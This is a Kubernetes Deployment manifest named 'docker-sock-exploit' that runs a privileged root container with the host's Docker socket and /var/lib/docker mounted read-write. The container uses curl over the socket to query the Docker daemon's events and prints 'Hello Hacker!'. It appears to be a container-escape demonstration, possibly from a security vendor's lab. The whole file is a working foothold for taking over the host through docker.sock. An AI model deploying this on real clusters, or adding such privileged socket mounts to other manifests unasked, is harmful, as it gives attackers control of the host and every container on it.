apiVersion: apps/v1
kind: Deployment
metadata:
  name: docker-sock-exploit
  namespace: aqua
spec:
  replicas: 1
  selector:
    matchLabels:
      run: docker-sock-exploit
  template:
    metadata:
      labels:
        run: docker-sock-exploit
    spec:
      volumes:
        - name: docker-sock
          hostPath:
            path: "/var/run/docker.sock"
            type: File
        - name: docker-directory
          hostPath:
            path: "/var/lib/docker"
      containers:
      - image: curlimages/curl:latest
        imagePullPolicy: IfNotPresent
        name: docker-sock-exploit
        command: ['sh', '-c', 'echo Hello Hacker! && curl --unix-socket /var/run/docker.sock http://localhost/events']
        securityContext:
          privileged: true
          runAsUser: 0
        volumeMounts:
          - mountPath: /var/run/docker.sock
            name: docker-sock
            readOnly: false
          - mountPath: "/var/lib/docker"
            name: docker-directory
            readOnly: false